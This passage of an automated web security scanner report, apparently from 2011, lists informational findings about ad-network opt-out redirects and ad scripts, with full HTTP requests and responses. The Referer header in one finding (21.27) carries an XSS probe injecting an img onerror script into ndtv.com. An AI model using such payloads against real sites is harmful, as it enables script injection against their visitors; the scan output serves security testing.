Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMIMP=102679&1315097282; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA; CMSC=TmLhpg**; CMDD=AAHRwAE*; CMD2=AAFbVk5i4aYAAdHAAAOPLAEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMRUM2=04000000002925993182975414771&03000000004e62cac5-3093-5789-301b-6f4e7fbf3921; CMST=TmLhpk5i4aoC

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 03:02:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:02:27 GMT
Content-Length: 941
Connection: close
Set-Cookie: CMID=hAk1xUgDlEwAAE9dokoAAAAX;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 03:02:27 GMT
Set-Cookie: CMTS='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 03:02:27 GMT;Discard
Set-Cookie: CMTP='';domain=casalemedia.com;path=/;expires=Sat, 03 Sep 2011 03:02:27 GMT;Discard
Set-Cookie: CMPS=200;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 03:02:27 GMT
Set-Cookie: CMPP=012;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 03:02:27 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771%5D%5D%3E%3E&febb72d3938b2974c9559972&d7847560edacdaa8acfa5ba0&03000000004e62cac5-3093-5789-301b-6f4e7fbf3921&47d0c6cc003b0b20)!(sn%3D*)!(sn%3D*&8742c8826e740e8c)!(sn%3D*)!(sn%3D*&14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 03:02:27 GMT
Set-Cookie: CMST=TmLhpk5i6kMS;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 03:02:27 GMT
Set-Cookie: CMDD=AAHRwBdx3rbvl7vZrbttAAAA96w*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 03:02:27 GMT
Set-Cookie: CMD2=AAFbfk5i4gIAAdHAAAOPCAEBAAABXX5OYuSMAAHRwAADlMcBAQAAAVetTmLkxAAB0cAAA5dnAQEAAAFakE5i5P4AAdHAAAOQjQEBAAABXoZOYuR0AAHRwAADl6EBAQAAATk1TmLkpgAB0cAAAwS1AQEAAAFbVk5i4aYAAdHAAAOPLAEBAAABSvhOYuSIAAHRwAADe4ABAQAAAVtzTmLqQwAB0cAAA4zXY2MAAAEmG05i5P4AAdHAAANcnQEBAAABWkROYuTEAAHRwAADh84BAQAAASerTmLkpgAB0cAAA3qYAQEAAAEuSE5i5JEAAdHAAAN+SwMDAAABUkBOYuSYAAHRwAADXxwBAQA*;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 03:02:27 GMT

document.write('<iframe id=\'c552a030\' name=\'c552a030\' src=\'http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=24952&bannerid=159988&did=1805404e5b&rtb=10&z=0.87&b=_YO%252fqIhyRbElesBboSAyxfA%253
...[SNIP]...
</iframe>');document.write('<img src="http://casale-match.dotomi.com/?cm_dsp_id=22&cm_user_id=hAk1xUgDlEwAAE9dokoAAAAX&cm_callback_url=http%3A%2F%2Fr.casalemedia.com%2Frum" style="display:none" width="0" height="0" alt="" border="0" />');

21.24. http://as.serving-sys.com/OptOut/nai_optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /OptOut/nai_optout.aspx?verify=1 HTTP/1.1
Host: as.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:55 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>

21.25. http://as.serving-sys.com/OptOut/nai_optout_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout_results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /OptOut/nai_optout_results.aspx?nocache=0.6035262 HTTP/1.1
Host: as.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:39:42 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.26. http://as.serving-sys.com/OptOut/nai_optout_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout_results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /OptOut/nai_optout_results.aspx?nocache=0.9691268 HTTP/1.1
Host: as.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; A3=nWL3bnVZ0c7w00001m4ccbnf10c7w00000nWEbbnVZ0c7w00001; B3=bIn70000000002wma+nN0000000000wk; u2=0379bc48-f176-4409-abc7-60fec876d6363JN04g

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:15 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>.</h2>
</body></html>

21.27. http://cas.criteo.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /delivery/afr.php?zoneid=2873&ct0=http://yads.zedo.com/ads2/c?a=680391%3Bn=826%3Bx=2309%3Bc=826000471,826000471%3Bg=172%3Bi=1%3B1=99%3B2=1%3Bs=318%3Bg=172%3Bm=82%3Bw=47%3Bi=1%3Bu=mLs5ThcyantsGCRD8ld6EMRU~080311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=1%3Bse=1%3Bp=8%3Bf=842351%3Bh=842216%3Bo=20%3By=305%3Bv=1%3Bt=r%3Bl=1%3Bs%3D318%3Bu%3DmLs5ThcyantsGCRD8ld6EMRU%7E080311%3Bz%3D0.44168801041758043%3B3%3Dz4-633%3Bk%3D HTTP/1.1
Host: cas.criteo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: uid=6731d4ad-7dae-4402-b507-a0bc233d79fb; udc=*1inDWGInjp3v9A0UEkawA9COlppbPdQtXlZBJL53NLEYeNZFB6KVh1%2f3byoeutZES; uic=*1pOlwoshvAW2x3Oz%2bjok0cvVUTldU9thEXDVJHERJCsS8Qa8h95CnNUGIZvfT3E7MxvviQAdwbClCyEye0669isBI09H1R%2bKRO%2fltWpPRjN8%3d; evt=*1y97%2bNEPoN61o4EOCN%2fR2J9xVlHZMgVk%2b%2b2CwFGGZfIU%3d; dis=*1XmOxq%2fmSxhLoU64z6TUPhBs1zaShz1xQQePMPhBVwyTVh33LYBS4pvzVSOE81nVMZQYhfHqF5G0yG1Dq8vAZp3%2bO8vRAnxCC7C9pSJ6QxWE5X6kBcEEGq862oRXQDTMaS1VE3AvjP580xamUykIo4kdJ7KGHtw3Qo8rrnGR%2b6UKpFfUpdCRwL%2f%2foZlg%2btMU0cZIzwvzL71xXf4oOnzurTvKhlnGuF3MI7nt0VVTVWX2Z9WHcKfBwC34nJW5UXYyop15T%2b46tONc8o%2fIZjmZDomE0TI5%2fMrKU3devz3gwsaigtXccAYxweYJeCdfRuWdweb9uBwInQFdVmMu%2b%2fAdet%2fYoh5uTBU3eZC7KbbAXHTAiR1VYK2B05oSHO2%2b%2flMZ1an3hipaytvxXiGle4ClTiKtJvQZUhhbMZEwD0E5ZTj%2b7IRqnP21iYqFonwkmyN9SmPxqdfm9VvHTYPzoKnUixFmApPR9YFLUhZOVBiNB1FqfLHSOYryoj0qbS%2bYsrqwQew5oO50TSebVeb0uPmCjhSUFnGfFpA9emYgB48HBR%2bOHUS3NzNN155bXw87lEqSCfFcjxtdAmTq4sXrEC2uO70IszUokDrNDVCUqTaZRJaatmquLulBNvKrx9WjARERMvIdKePJ%2bNKUzRXHdaGwsHJaJtTtBhW3NFfO4PPe0z9rH69LtY9ojapCXuvGCupeOaq0OEM%2fzDYFat0spm%2bd9XhFkQM%2fM6EtVaFANFKqBhr87YJXjphVTTJ5DhyYmc5Yvjv05tk0rh%2bBNK7Uii6NSqQ%3d%3d; OAID=6731d4ad7dae4402b507a0bc233d79fb; OACBLOCK=; OACCAP=; OASCCAP=; udi=*14SAGaJV%2fu3dc4n2M4vVC1w%3d%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 04 Sep 2011 04:04:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: lbdis=; domain=.criteo.com; expires=Sat, 03-Sep-2011 04:04:05 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 04-Oct-2011 04:04:06 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 04-Oct-2011 04:04:06 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Set-Cookie: udc=*1I%2bv582b9L%2bZ%2f4SzOHZQ17wHbLx4d3iDkm0IPLUufXbVEy97tOm24fy6g4AzQ8pmct%2bj8gK7y7WMH8jFSP1kzK1irBjx8ZwpnKL3XshyWxpoZMPjPBxDUyX74xIUAh1DWFgMAJWc36rpUH28ClAZmYiELO809CrtxGznxsRYx8AkkHA9mseHX5WCfZxGgmn4dte%2b3y2npBm6T7VEpZ%2bN5P1ItkIKehSVHeZ4eZ8y93XKxE1RDPjXmpIRv%2fPYMuDUqq0AflTRqHlGw4SB6mwzBw3H7cLAAIY9XN6IDRKesDBF02UWg4DtCSYjcyhyKh4ecZw5IFn%2fJiYBGiqFAHV0czdkrtFn2QjCWWoD5W55uk9pobM6qvEE%2fZHFRudtwxT2SEFouzzAOrgL%2bBpgyEpPhlzLGgR11xUDBPwOWA0ExDqsWOAhxL5kk3XLFNee%2baYHk0dxdM9dvLty4GNgCqYnuCkWMTm%2fXO8AJyTmAo7Gj53FifzhGUEIcyXfCG8zdZxvyUXLuDWPJcbMOGl4rzu7nySZ6%2b%2fr%2flm9AYKHqvMvuAvAvVQg8YHjQvslyx9O5tcOcs%2fOLMb57vSJsgSENdSqVyYrwbBjPUFMfxqxIC1xSyk2BxsAGiepo6POvI2jTHvzP0rjXyhKgVJ%2bINzNc%2bYlYz6b6%2bsLvsfcuybu4gwpa4Ab3Jp6PrCcNU%2bARfjnF7AocyEZ51%2ff%2fPUmVpxnJk32J79cBiGYnvwhN3puBxtZe6xXu394NXUY6sphVCJQ%2bIgVVSjzjexe4JcP5Pp7RCoZfvAINUgGi1Okww0Poz6YZA5u9pMgMsaVTzZtjKj4sbIGiORTv%2fCaaVLNJyya5MvUB0%2fxB4x0WvqyIkv6O5esVuQqM4aHeFAIXvJ6qyrJtkxl5JAkgGqVQXHWSvZSMgGzDqZmuL%2fB80wM6WU9vyZIguR1p8U3lT84UPi%2fPZySw2D2TM7NG%2f4AnpY%2fxyzva9ftmG9H26tTy3dQOSSwaB73bBu2KHefIs3Q4JRBVdllMwwekMrwkBOihd9cPCukAjopLE8bmiSumGXR7wvT8%2fg5K6I7HBe0fhjTfpQPKLMS3KvduaRf28VNy9n396iga94jpW%2fIZFJavL1veOcrjwIVHBS0UtrRGzznDff%2bwN%2fAG3oRVI2KohTr%2fe0kauEu9O1GTxyMySLJI6dPTSDvwzeEcBqAVUTey66faIcgBKeoqzB6EVhS5iUznDUFxqpR569rL7tyGUYvS7wbXeHpsFE7fCe6ZVQd0iB47%2blZAevXvCC0fzU4CxyJV8jWRbou2Tyx2h9K%2fgDvSF81UwtQmFBGy8mcJxtR7yV0Aryn8d2ZBGI%2fuCtgttppG8kKy4otc%2fT0wcyDR8gh%2bFNYVGuZVncpywOA6nvTiwutShHxaHL9FrKAtY0o7Oif123dt4eqiljI%2bkQLLvRoMtqdTrXtTit%2bLndsrhcheCIO0C5TszjkimZ3nQsGZr9IW1IFXqih2rd7tbfwSpOXpPZ5qz4QF%2bsxznbRVnLNvoKg6%2brpA5gm%2bO3swW2qhX0zLLmzWMEOAJrsx5w%3d%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 05:04:06 GMT; path=/
Set-Cookie: udi=*1mGxUYGaPBBEcTGehtFkwyw%3d%3d; domain=.criteo.com; expires=Mon, 05-Sep-2011 04:04:06 GMT; path=/
Content-Length: 3202

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<a h
...[SNIP]...
0%26octx%3d0%26oseg%3d-1%26populationids%3d%7bpopulationids%7d%26r%3dhttp%253A%252F%252Fgan.doubleclick.net%252Fgan_click%253Flid%253D41000000032401783%2526pubid%253D21000000000293450" target="_blank"><img src="http://gan.doubleclick.net/gan_impression?lid=41000000030310797&pubid=21000000000293450" border=0 alt="Netflix Standard Display Offer 300x250"></a>
...[SNIP]...

21.28. http://cdn.ndtv.com/static/js/jquery_tool_min-1.1.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.ndtv.com
Path:   /static/js/jquery_tool_min-1.1.2.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/js/jquery_tool_min-1.1.2.js?version-12082011 HTTP/1.1
Host: cdn.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
ETag: "8c1b-4a32adc4f96c0"
Last-Modified: Fri, 13 May 2011 16:33:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 35867
Cache-Control: max-age=879291
Expires: Wed, 14 Sep 2011 06:48:13 GMT
Date: Sun, 04 Sep 2011 02:33:22 GMT
Connection: close

(function(d){d.tools=d.tools||{};d.tools.tabs={version:"1.0.4",conf:{tabs:"a",current:"current",onBeforeClick:null,onClick:null,effect:"default",initialIndex:0,event:"click",api:false,rotate:false},ad
...[SNIP]...
<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a>
...[SNIP]...

21.29. http://choice.atdmt.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7556559 HTTP/1.1
Host: choice.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&nocache=0.7556559
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:44:17 GMT
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.microsoft.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7556559">here</a>.</h2>
</body></html>
...[SNIP]...

21.30. http://choice.atdmt.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.microsoft.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:33:55 GMT
Content-Length: 185

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.microsoft.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>

21.31. http://choice.atdmt.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.7367049 HTTP/1.1
Host: choice.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.microsoft.com/AdvertisementChoice/opt.out?optout&nocache=0.7367049
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.atdmt.com; expires=Sun, 04-Sep-2016 11:24:48 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:24:47 GMT
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.microsoft.com/AdvertisementChoice/opt.out?optout&amp;nocache=0.7367049">here</a>.</h2>
</body></html>
...[SNIP]...

21.32. http://choice.bing.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7556559 HTTP/1.1
Host: choice.bing.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _UR=OMW=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110830; SRCHD=MS=1931162&SM=1&D=1926637&AF=NOFORM; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&nocache=0.7556559
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 10:59:40 GMT
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7556559">here</a>.</h2>
</body></html>

21.33. http://choice.bing.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.bing.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _UR=OMW=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110830; SRCHD=MS=1931162&SM=1&D=1926637&AF=NOFORM; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.atdmt.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 10:59:30 GMT
Content-Length: 181

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.atdmt.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>

21.34. http://choice.bing.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.7367049 HTTP/1.1
Host: choice.bing.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _UR=OMW=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110830; SRCHD=MS=1931162&SM=1&D=1926637&AF=NOFORM; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.atdmt.com/AdvertisementChoice/opt.out?optout&nocache=0.7367049
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.bing.com; expires=Sun, 04-Sep-2016 10:59:29 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 10:59:29 GMT
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.atdmt.com/AdvertisementChoice/opt.out?optout&amp;nocache=0.7367049">here</a>.</h2>
</body></html>

21.35. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7556559 HTTP/1.1
Host: choice.live.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wla42=; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?Verify&nocache=0.7556559
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sun, 04 Sep 2011 11:42:16 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7556559">here</a>.</h2>
</body></html>

21.36. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
